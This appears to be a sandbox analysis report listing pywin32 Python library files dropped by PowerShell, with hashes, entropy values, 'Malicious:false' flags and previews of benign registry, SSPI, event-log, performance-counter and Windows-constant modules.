                                                                                                                                                                                                            Preview:# This module is very old and useless in this day and age! It will be..# removed in a few years (ie, 2009 or so...)....import warnings....warnings.warn(.. "The regcheck module has been pending deprecation since build 210",.. category=PendingDeprecationWarning,..)....import os..import sys....import regutil..import win32api..import win32con......def CheckRegisteredExe(exename):.. try:.. os.stat(.. win32api.RegQueryValue(.. regutil.GetRootKey(), regutil.GetAppPathsKey() + "\\" + exename.. ).. ).. except (OSError, win32api.error):.. print("Registration of %s - Not registered correctly" % exename)......def CheckPathString(pathString):.. for path in pathString.split(";"):.. if not os.path.isdir(path):.. return "'%s' is not a valid directory!" % path.. return None......def CheckPythonPaths(verbose):.. if verbose:.. print("Python Paths:").. # Check the core path.. if verbose:..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12699
                                                                                                                                                                                                            Entropy (8bit):4.9192568983685865
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:jAAIcmGVxXTYUKYF/+0t7cu0wrY1chvmNvsv3ua47k1mdm71D:cAIcVVxXTYUKYF/r7cu0wrY1chvmNvs/
                                                                                                                                                                                                            MD5:A2151BF788A20B95135F1437C2DF6FBE
                                                                                                                                                                                                            SHA1:D8AD4168C75709231921E276EC07821273882D7F
                                                                                                                                                                                                            SHA-256:AB1070AC1F316929940B62DDEBDCF3346BB58D41D687CDA60BBED15E4800B17D
                                                                                                                                                                                                            SHA-512:94CACA8C9445C626952F066558C5975CEF2DFDFB9FA418810BD29DB7DB8298A3DDAB5279A7C983BE5D6216000D3E5EADF1ECB35883C4BA329C6DD97E102C4D76
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Some registry helpers...import os..import sys....import win32api..import win32con....# A .py file has a CLSID associated with it (why? - dunno!)..CLSIDPyFile = "{b51df050-06ae-11cf-ad3b-524153480001}"....RegistryIDPyFile = "Python.File" # The registry "file type" of a .py file..RegistryIDPycFile = "Python.CompiledFile" # The registry "file type" of a .pyc file......def BuildDefaultPythonKey():.. """Builds a string containing the path to the current registry key..... The Python registry key contains the Python version. This function.. uses the version of the DLL used by the current process to get the.. registry key currently in use... """.. return "Software\\Python\\PythonCore\\" + sys.winver......def GetRootKey():.. """Retrieves the Registry root in use by Python.""".. keyname = BuildDefaultPythonKey().. try:.. k = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyname).. k.close().. return win32con.HKEY_CURRENT_USER.. except win
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15995
                                                                                                                                                                                                            Entropy (8bit):4.784105295539483
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:HqGoA8Re3Kdpe3Ks6qn3y3m9n3yyvVN2LDUFmmHO2fuzIg36KuQvb8Yyy01y0H+M:KBFa1NNQvM+1ofgf0uS
                                                                                                                                                                                                            MD5:1A81D1F6284B663FE850C247CC99F3CA
                                                                                                                                                                                                            SHA1:5EB21F2B5F658252E188B804C681F5EDCA54EE50
                                                                                                                                                                                                            SHA-256:46F93F4EBC9160251E3CDF841F5F9FA731AD7FDB2EE3721EBCFD8C63A95706D0
                                                                                                                                                                                                            SHA-512:F5FAA10785460464B35A49A557D7719D7A4000A5A8B72FE718C6C67939AB3048A9E8694E666AABC4312BCCFAE1F45486AE02D1D92658A1136B438F51797758B1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""..Helper classes for SSPI authentication via the win32security module.....SSPI authentication involves a token-exchange "dance", the exact details..of which depends on the authentication provider used. There are also..a number of complex flags and constants that need to be used - in most..cases, there are reasonable defaults.....These classes attempt to hide these details from you until you really need..to know. They are not designed to handle all cases, just the common ones...If you need finer control than offered here, just use the win32security..functions directly..."""....# Based on Roger Upole's sspi demos...# $Id$..import sspicon..import win32security....error = win32security.error # Re-exported alias......class _BaseAuth:.. def __init__(self):.. self.reset().... def reset(self):.. """Reset everything to an unauthorized state""".. self.ctxt = None.. self.authenticated = False.. self.initiator_name = None.. self.service_name =
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16174
                                                                                                                                                                                                            Entropy (8bit):5.117968704659986
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:x8pro+ULXocncM4athd2nM38yDfBf2uJ2:xQE39ncM4athL8ylf2l
                                                                                                                                                                                                            MD5:74364EBCE379A869185809965E6B0DB6
                                                                                                                                                                                                            SHA1:1CAD91331FAC7780490D2C1DE444462B45A2680C
                                                                                                                                                                                                            SHA-256:F197157F53188F7498F60807580E12F0FAA8FF7BDACB2A0EC60A49508949D8F1
                                                                                                                                                                                                            SHA-512:F24674E9E43F5F1B4E677700A6BEF454C0F11264E2EDAD583D88ECEA448E38C9B1CA62AF7E87938F3887C37ED22A72A7C7083037862825E0DE720C5A400E3530
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Generated by h2py from c:\microsoft sdk\include\sspi.h..ISSP_LEVEL = 32..ISSP_MODE = 1......def SEC_SUCCESS(Status):.. return (Status) >= 0......SECPKG_FLAG_INTEGRITY = 1..SECPKG_FLAG_PRIVACY = 2..SECPKG_FLAG_TOKEN_ONLY = 4..SECPKG_FLAG_DATAGRAM = 8..SECPKG_FLAG_CONNECTION = 16..SECPKG_FLAG_MULTI_REQUIRED = 32..SECPKG_FLAG_CLIENT_ONLY = 64..SECPKG_FLAG_EXTENDED_ERROR = 128..SECPKG_FLAG_IMPERSONATION = 256..SECPKG_FLAG_ACCEPT_WIN32_NAME = 512..SECPKG_FLAG_STREAM = 1024..SECPKG_FLAG_NEGOTIABLE = 2048..SECPKG_FLAG_GSS_COMPATIBLE = 4096..SECPKG_FLAG_LOGON = 8192..SECPKG_FLAG_ASCII_BUFFERS = 16384..SECPKG_FLAG_FRAGMENT = 32768..SECPKG_FLAG_MUTUAL_AUTH = 65536..SECPKG_FLAG_DELEGATION = 131072..SECPKG_FLAG_READONLY_WITH_CHECKSUM = 262144..SECPKG_ID_NONE = 65535....SECBUFFER_VERSION = 0..SECBUFFER_EMPTY = 0..SECBUFFER_DATA = 1..SECBUFFER_TOKEN = 2..SECBUFFER_PKG_PARAMS = 3..SECBUFFER_MISSING = 4..SECBUFFER_EXTRA = 5..SECBUFFER_STREAM_TRAILER = 6..SECBUFFER_STREAM_HEADER = 7..SECBUFFER_NEG
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):341
                                                                                                                                                                                                            Entropy (8bit):4.621595838490788
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:SD4cBz3TqzKdDze/VieikwcBTARAXGaTW/8920LLtQCR6Uh286AIPKkJM:A4cBeus/I8TBcCtAW2asWlaKkJM
                                                                                                                                                                                                            MD5:E3FFF77D62CE396E14F7DF417138F6FE
                                                                                                                                                                                                            SHA1:CFD04F417F98796E4831CA68BD2C2067617F84F0
                                                                                                                                                                                                            SHA-256:BAFD3E4FBD981EABCE55B6A6C004861C1055D6A903E0563AF01CA9ABB371E7A9
                                                                                                                                                                                                            SHA-512:785313CFA1A4FB5B795B38E31C7FA42A7A95352A6818538582A4CD9F1FA44C89075952E4CB239B4319C75AAE75D40F1B9D49E916EF69652DD4B20CB4B316A970
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# win2kras used to be an extension module with wrapped the "new" RAS functions..# in Windows 2000, so win32ras could still be used on NT/etc...# I think in 2021 we can be confident pywin32 is not used on earlier OSs, so..# that functionality is now in win32ras...#..# This exists just to avoid breaking old scripts...from win32ras import *..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):122135
                                                                                                                                                                                                            Entropy (8bit):5.140129369769224
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:UnZB2/B6mXSBqYXdnRTV8iRzQKbp2+Ql/dU8MPW7ZHpSDwahc/mKvfsSnn5sGIsD:inXOil/2+o5sfsmbO/
                                                                                                                                                                                                            MD5:CC0523996E78029AAC79588F11E96B09
                                                                                                                                                                                                            SHA1:508DA6104B611A48A02EFF857B32C8601417743F
                                                                                                                                                                                                            SHA-256:3F01BDFF95236B591258D8BDA605CC721E5E921D350CC0483FC5170DF78E672D
                                                                                                                                                                                                            SHA-512:8A16B5E16D98BDB69F5EBA18EA8807210434A8010AB8D4707C0EB3890E415FAF8F5534BE076D56A4692C3E3E203965451DE1784C58B3F959879496BBF79B97F4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Generated by h2py from commdlg.h (plus modifications 4jan98)..WINVER = 1280..WM_USER = 1024..PY_0U = 0..OFN_READONLY = 1..OFN_OVERWRITEPROMPT = 2..OFN_HIDEREADONLY = 4..OFN_NOCHANGEDIR = 8..OFN_SHOWHELP = 16..OFN_ENABLEHOOK = 32..OFN_ENABLETEMPLATE = 64..OFN_ENABLETEMPLATEHANDLE = 128..OFN_NOVALIDATE = 256..OFN_ALLOWMULTISELECT = 512..OFN_EXTENSIONDIFFERENT = 1024..OFN_PATHMUSTEXIST = 2048..OFN_FILEMUSTEXIST = 4096..OFN_CREATEPROMPT = 8192..OFN_SHAREAWARE = 16384..OFN_NOREADONLYRETURN = 32768..OFN_NOTESTFILECREATE = 65536..OFN_NONETWORKBUTTON = 131072..OFN_NOLONGNAMES = 262144..OFN_EXPLORER = 524288 # new look commdlg..OFN_NODEREFERENCELINKS = 1048576..OFN_LONGNAMES = 2097152 # force long names for Python 3 modules..OFN_ENABLEINCLUDENOTIFY = 4194304 # send include message to callback..OFN_ENABLESIZING = 8388608..OFN_DONTADDTORECENT = 33554432..OFN_FORCESHOWHIDDEN = 268435456 # Show All files including System and hidden files..OFN_EX_NOPLACESBAR = 1..OFN_SHAREFALLTHROUGH = 2..OFN_
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):74419
                                                                                                                                                                                                            Entropy (8bit):5.17321718391661
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:KW4iAD+sv3mQjxi03b9fqvGsMIgvShNhl0:bYkA
                                                                                                                                                                                                            MD5:1873725E9C16F5F85D4F532DCB25B29E
                                                                                                                                                                                                            SHA1:9D3BB5114510965CCAB9C59BCEBCB909ECE80715
                                                                                                                                                                                                            SHA-256:0B167AB082CF1AF23EAD50CE664A1DE4E92865F8223822A3EB2748FAAD38647C
                                                                                                                                                                                                            SHA-512:DE46FBF8037BF71F53EFB1458FE1E7875E656ABEF536CDCD9BE2BD5AB262FA91CEE852CD9003BFC738771B76E4C744D5ECB9D0F43372C3058756476DE75102E5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Generated by h2py from WinCrypt.h..def GET_ALG_CLASS(x):.. return x & (7 << 13)......def GET_ALG_TYPE(x):.. return x & (15 << 9)......def GET_ALG_SID(x):.. return x & (511)......ALG_CLASS_ANY = 0..ALG_CLASS_SIGNATURE = 1 << 13..ALG_CLASS_MSG_ENCRYPT = 2 << 13..ALG_CLASS_DATA_ENCRYPT = 3 << 13..ALG_CLASS_HASH = 4 << 13..ALG_CLASS_KEY_EXCHANGE = 5 << 13..ALG_CLASS_ALL = 7 << 13..ALG_TYPE_ANY = 0..ALG_TYPE_DSS = 1 << 9..ALG_TYPE_RSA = 2 << 9..ALG_TYPE_BLOCK = 3 << 9..ALG_TYPE_STREAM = 4 << 9..ALG_TYPE_DH = 5 << 9..ALG_TYPE_SECURECHANNEL = 6 << 9..ALG_SID_ANY = 0..ALG_SID_RSA_ANY = 0..ALG_SID_RSA_PKCS = 1..ALG_SID_RSA_MSATWORK = 2..ALG_SID_RSA_ENTRUST = 3..ALG_SID_RSA_PGP = 4..ALG_SID_DSS_ANY = 0..ALG_SID_DSS_PKCS = 1..ALG_SID_DSS_DMS = 2..ALG_SID_DES = 1..ALG_SID_3DES = 3..ALG_SID_DESX = 4..ALG_SID_IDEA = 5..ALG_SID_CAST = 6..ALG_SID_SAFERSK64 = 7..ALG_SID_SAFERSK128 = 8..ALG_SID_3DES_112 = 9..ALG_SID_CYLINK_MEK = 12..ALG_SID_RC5 = 13..ALG_SID_AES_128 = 14..ALG_SID_AES_192 = 15
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7829
                                                                                                                                                                                                            Entropy (8bit):4.6877927156105965
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:xQrLfFzd0A6WXokyguVkeVoAEi+TgUdHwNuZuLxhoAsIIWaCYPeebH0V:xQ9zuxWXokyguieVoA56gqHwoWhohoYC
                                                                                                                                                                                                            MD5:1CB4DBF159484520F0C74D763971EFD9
                                                                                                                                                                                                            SHA1:E302AE6BF11725E3293CA0C166FF0F15166A4CF5
                                                                                                                                                                                                            SHA-256:68ED71CA1B04895DA3C39050B105C6E68738B0F887E5E593834A5E057ADB7847
                                                                                                                                                                                                            SHA-512:14BF8864DF6C034A526AA24CACBA9EE7B02C2BE6CD80D7D6F1F204279E3FF9E09D841FCB5687B2A64215019B58E332E2BCD7F1EE6E0234312C33069741046D61
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Event Log Utilities - helper for win32evtlog.pyd.."""....import win32api..import win32con..import win32evtlog..import winerror....error = win32api.error # Re-exported alias (The error the evtlog module raises)...langid = win32api.MAKELANGID(win32con.LANG_NEUTRAL, win32con.SUBLANG_NEUTRAL)......def AddSourceToRegistry(.. appName,.. msgDLL=None,.. eventLogType="Application",.. eventLogFlags=None,.. categoryDLL=None,.. categoryCount=0,..):.. """Add a source of messages to the event log..... Allows Python program to register a custom source of messages in the.. registry. You must also provide the DLL name that has the message table, so the.. full message text appears in the event log..... Note that the win32evtlog.pyd file has a number of string entries with just "%1".. built in, so many Python programs can simply use this DLL. Disadvantages are that.. you do not get language translation, and the full text is stored in the event log,.. blowin
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):29889
                                                                                                                                                                                                            Entropy (8bit):4.883258673225144
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:X9EbSLwZp2E8S9ONiv1y6Oc7un341/m2PG1dSQB7Hhioy/w0esp:abSLovONgvOYoF5y/wdsp
                                                                                                                                                                                                            MD5:032E87B8EBBE06D9600C2E14599A3563
                                                                                                                                                                                                            SHA1:888FF895CFE7183373F11D2159BAA5E1A6E88DFC
                                                                                                                                                                                                            SHA-256:9F981AF3235833BC7C65188C22A339F47844B68BAB0ACA422F32056E05853252
                                                                                                                                                                                                            SHA-512:42923E683CE97499B94940CAC07C085A9BD3F5EDB6F38ADA5EBDB0E1BAD7CA671E32D1ED14160A5C60FFFC840CC84779D8C2BCE1BDFB38F19DA77F6FFC7A8275
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# This is a work in progress - see Demos/win32gui_menu.py....# win32gui_struct.py - helpers for working with various win32gui structures...# As win32gui is "light-weight", it does not define objects for all possible..# win32 structures - in general, "buffer" objects are passed around - it is..# the callers responsibility to pack the buffer in the correct format...#..# This module defines some helpers for the commonly used structures...#..# In general, each structure has 3 functions:..#..# buffer, extras = PackSTRUCTURE(items, ...)..# item, ... = UnpackSTRUCTURE(buffer)..# buffer, extras = EmtpySTRUCTURE(...)..#..# 'extras' is always items that must be held along with the buffer, as the..# buffer refers to these object's memory...# For structures that support a 'mask', this mask is hidden from the user - if..# 'None' is passed, the mask flag will not be set, or on return, None will..# be returned for the value if the mask is not set...#..# NOTE: I considered making these structures look
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):44303
                                                                                                                                                                                                            Entropy (8bit):4.719824263845657
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:x6KiH7PEtKd/em6tbPwkfZwqpxH87BsjCZZAYeBoX4lUne:x6KG/em6tbYkfZwqpxH87BsjrNUne
                                                                                                                                                                                                            MD5:10934FA36DD5B065E3CB4EBF83CE4177
                                                                                                                                                                                                            SHA1:B83B70FAA23B55F51243612F0FE90FBD3669B75A
                                                                                                                                                                                                            SHA-256:5D08D1208E96B6AB80786673B8B5238A8E4B139EECD1118B99FD3FC5A95D5CC9
                                                                                                                                                                                                            SHA-512:DFB7D8C8D5168C0BD1BF6974CBF899BFFCBDED502ACFA6A28E2A5C6011BFB3DA179B3CEC9740E5E8C31A8A6E5690FF33AF3B0C5113A5406D1515CEEFE8228A08
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Generated by h2py from \mssdk\include\WinInet.h....INTERNET_INVALID_PORT_NUMBER = 0..INTERNET_DEFAULT_PORT = 0..INTERNET_DEFAULT_FTP_PORT = 21..INTERNET_DEFAULT_GOPHER_PORT = 70..INTERNET_DEFAULT_HTTP_PORT = 80..INTERNET_DEFAULT_HTTPS_PORT = 443..INTERNET_DEFAULT_SOCKS_PORT = 1080..INTERNET_MAX_HOST_NAME_LENGTH = 256..INTERNET_MAX_USER_NAME_LENGTH = 128..INTERNET_MAX_PASSWORD_LENGTH = 128..INTERNET_MAX_PORT_NUMBER_LENGTH = 5..INTERNET_MAX_PORT_NUMBER_VALUE = 65535..INTERNET_MAX_PATH_LENGTH = 2048..INTERNET_MAX_SCHEME_LENGTH = 32..INTERNET_KEEP_ALIVE_ENABLED = 1..INTERNET_KEEP_ALIVE_DISABLED = 0..INTERNET_REQFLAG_FROM_CACHE = 0x00000001..INTERNET_REQFLAG_ASYNC = 0x00000002..INTERNET_REQFLAG_VIA_PROXY = 0x00000004..INTERNET_REQFLAG_NO_HEADERS = 0x00000008..INTERNET_REQFLAG_PASSIVE = 0x00000010..INTERNET_REQFLAG_CACHE_WRITE_DISABLED = 0x00000040..INTERNET_REQFLAG_NET_TIMEOUT = 0x00000080..INTERNET_FLAG_RELOAD = -2147483648..INTERNET_FLAG_RAW_DATA = 0x40000000..INTERNET_FLAG_EXISTING_CON
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):19159
                                                                                                                                                                                                            Entropy (8bit):4.948868638846814
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:WDi2x4Wv/Q84cU+/bn35+U5jtzpoj89W1PaDZlsAzPmeyW9MdVZjyLnD:WDi293zn35+U5jtzpHYgZSIMdre
                                                                                                                                                                                                            MD5:50C32F19AEA9A7FD7AF5069A8BB39A55
                                                                                                                                                                                                            SHA1:19876C87C8B89F3155A43DF1905A2E70A66D5FF1
                                                                                                                                                                                                            SHA-256:EA00857B02100CE991CE620FA6438C6569136F642E844FC742DFA6F6B4E1E0D9
                                                                                                                                                                                                            SHA-512:89F361EFE3F96CC9FD29496E4C4B9463E6AD7900B510B4605DD5261472C6A539E379A1B9333EEEC0E88FD5D19793EABD611552C29AD5E40CC7D4FEA2822733AB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Generated by h2py from lmaccess.h....# Included from lmcons.h..CNLEN = 15..LM20_CNLEN = 15..DNLEN = CNLEN..LM20_DNLEN = LM20_CNLEN..UNCLEN = CNLEN + 2..LM20_UNCLEN = LM20_CNLEN + 2..NNLEN = 80..LM20_NNLEN = 12..RMLEN = UNCLEN + 1 + NNLEN..LM20_RMLEN = LM20_UNCLEN + 1 + LM20_NNLEN..SNLEN = 80..LM20_SNLEN = 15..STXTLEN = 256..LM20_STXTLEN = 63..PATHLEN = 256..LM20_PATHLEN = 256..DEVLEN = 80..LM20_DEVLEN = 8..EVLEN = 16..UNLEN = 256..LM20_UNLEN = 20..GNLEN = UNLEN..LM20_GNLEN = LM20_UNLEN..PWLEN = 256..LM20_PWLEN = 14..SHPWLEN = 8..CLTYPE_LEN = 12..MAXCOMMENTSZ = 256..LM20_MAXCOMMENTSZ = 48..QNLEN = NNLEN..LM20_QNLEN = LM20_NNLEN..ALERTSZ = 128..NETBIOS_NAME_LEN = 16..CRYPT_KEY_LEN = 7..CRYPT_TXT_LEN = 8..ENCRYPTED_PWLEN = 16..SESSION_PWLEN = 24..SESSION_CRYPT_KLEN = 21..PARMNUM_ALL = 0..PARM_ERROR_NONE = 0..PARMNUM_BASE_INFOLEVEL = 1000..NULL = 0..PLATFORM_ID_DOS = 300..PLATFORM_ID_OS2 = 400..PLATFORM_ID_NT = 500..PLATFORM_ID_OSF = 600..PLATFORM_ID_VMS = 700..MAX_LANMAN_MESSAGE_ID = 57
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):23976
                                                                                                                                                                                                            Entropy (8bit):4.452479368060979
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:YhNqFcyzm+nknpvaiSf9ViK2k/utoRzHUnkni8n8njCuuJSP68SsRznZ:Yh8FJzmq8AiKP/WoRT48V2aJSPhtZ
                                                                                                                                                                                                            MD5:8EC58AA03F71FAFEE7D62FA962DB64B1
                                                                                                                                                                                                            SHA1:F81014F0CFD945FFDBCD0C54140CD6B25D8700F2
                                                                                                                                                                                                            SHA-256:3418AF71E71E754F81942CF2FE81D8C9BFC153A92A93F3B259EE952A6887A83E
                                                                                                                                                                                                            SHA-512:3BE2D9BA2716D089193A7786A17B7220FD157278687770712D13CC40C5DB6F73206E5E66BA34EFA93D92B75A327D4B48EEDBEDD556EC706979A97C9A47845A06
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""..Performance Data Helper (PDH) Query Classes....Wrapper classes for end-users and high-level access to the PDH query..mechanisms. PDH is a win32-specific mechanism for accessing the..performance data made available by the system. The Python for Windows..PDH module does not implement the "Registry" interface, implementing..the more straightforward Query-based mechanism.....The basic idea of a PDH Query is an object which can query the system..about the status of any number of "counters." The counters are paths..to a particular piece of performance data. For instance, the path..'\\Memory\\Available Bytes' describes just about exactly what it says..it does, the amount of free memory on the default computer expressed..in Bytes. These paths can be considerably more complex than this,..but part of the point of this wrapper module is to hide that..complexity from the end-user/programmer.....EXAMPLE: A more complex Path.. '\\\\RAISTLIN\\PhysicalDisk(_Total)\\Avg. Disk Bytes/Read'..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7807
                                                                                                                                                                                                            Entropy (8bit):4.812161504788204
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:nqnQY8SwMCzgj8oq26+gupE+Et+RD6qTCREfTrLQRKz7:nIw38q216q+RSrZP
                                                                                                                                                                                                            MD5:58DEE4BE5234ABD80BB6D29D4BB85850
                                                                                                                                                                                                            SHA1:5F51432B9173DCF1B70C7B7D2A446D86FBC43BDF
                                                                                                                                                                                                            SHA-256:ADDC3ECE46A489CB584C1370F0D30BA089B447DA5FDA147380AD8A3439859404
                                                                                                                                                                                                            SHA-512:1FB38F27DF6BF3869995296C4B33F6B5590AB9AA3766AE4055B217D27F3241FEEA78787BB6468EC3EDD3D7021D7F0EEA0923F1CF3E89B4B16719A621117E685C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Utilities for the win32 Performance Data Helper module....Example:.. To get a single bit of data:.. >>> import win32pdhutil.. >>> win32pdhutil.GetPerformanceAttributes("Memory", "Available Bytes").. 6053888.. >>> win32pdhutil.FindPerformanceAttributesByName("python", counter="Virtual Bytes").. [22278144].... First example returns data which is not associated with any specific instance..... The second example reads data for a specific instance - hence the list return -.. it would return one result for each instance of Python running..... In general, it can be tricky finding exactly the "name" of the data you wish to query... Although you can use <om win32pdh.EnumObjectItems>(None,None,(eg)"Memory", -1) to do this,.. the easiest way is often to simply use PerfMon to find out the names..."""....from __future__ import annotations....import time....import win32pdh....error = win32pdh.error # Re-exported alias....# Handle some localization issues...# see http://support.micros
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):22331
                                                                                                                                                                                                            Entropy (8bit):4.424274583415392
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:eX9lbp85D55BOIk5DlB+Te+NA+np+uChjleKNhOjXfIkT8ZMk3/CCXTJPpTsLhKM:eX9lbp85D5X65hQi+CQp+uC3xkAZT3/y
                                                                                                                                                                                                            MD5:9BB53F39FEC15A7FC4E1D5C97B5AA401
                                                                                                                                                                                                            SHA1:9C0D5814B46C40FA673D6732A34E1608A84881E3
                                                                                                                                                                                                            SHA-256:91A564C5B23B52001BAFE9BB3A9001572AE53C0373CBA62091ADFDD302E3934C
                                                                                                                                                                                                            SHA-512:A82C595C2B10220F91AD4058FBAB7731BB0E8956D3BB888DE40EBF928BBCE4E6D6C2D7471CF7F6D8D0D6B722C3FAC2D6A18D14FFC1F536DB6DF5ECCE7F6E3C80
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Windows dialog .RC file parser, by Adam Walker.....# This module was adapted from the spambayes project, and is Copyright..# 2003/2004 The Python Software Foundation and is covered by the Python..# Software Foundation license..."""..This is a parser for Windows .rc files, which are text files which define..dialogs and other Windows UI resources..."""..from __future__ import annotations....import os..import pprint..import shlex..import stat..import sys....import commctrl..import win32con....__author__ = "Adam Walker"..__version__ = "0.11"...._controlMap = {.. "DEFPUSHBUTTON": 0x80,.. "PUSHBUTTON": 0x80,.. "Button": 0x80,.. "GROUPBOX": 0x80,.. "Static": 0x82,.. "CTEXT": 0x82,.. "RTEXT": 0x82,.. "LTEXT": 0x82,.. "LISTBOX": 0x83,.. "SCROLLBAR": 0x84,.. "COMBOBOX": 0x85,.. "EDITTEXT": 0x81,.. "ICON": 0x82,.. "RICHEDIT": "RichEdit20A",..}....# These are "default styles" for certain controls - ie, Visual Studio assumes..# the styles will be applied,
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):39104
                                                                                                                                                                                                            Entropy (8bit):4.671501417682213
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:SsPRiLZ4St2IaHGQGUgLQz27clWFBbMVo0V/HE5nuu+gT4GJyp9IqgS:SsqGq2IaEclmBYVo0V/HE5nuJgT4Gy
                                                                                                                                                                                                            MD5:7B0AEEFB10CBA8609D59D28DF6EA26BF
                                                                                                                                                                                                            SHA1:67D3CE3C3292978F7F8738E483E0864449502FC0
                                                                                                                                                                                                            SHA-256:997F622E24C7F4AFD07914ABB6B876E7FAF225C7FE0FEDE64122C80E3580CE3F
                                                                                                                                                                                                            SHA-512:60E32066D80F5BD3BB6345A07D63DE159646231C3F3E32A971C1C88397E28BD79D1DC97ABB72384852E8B9BDB3FFE91BD1A7A7E8A8A9F1068C012FFB8B045308
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
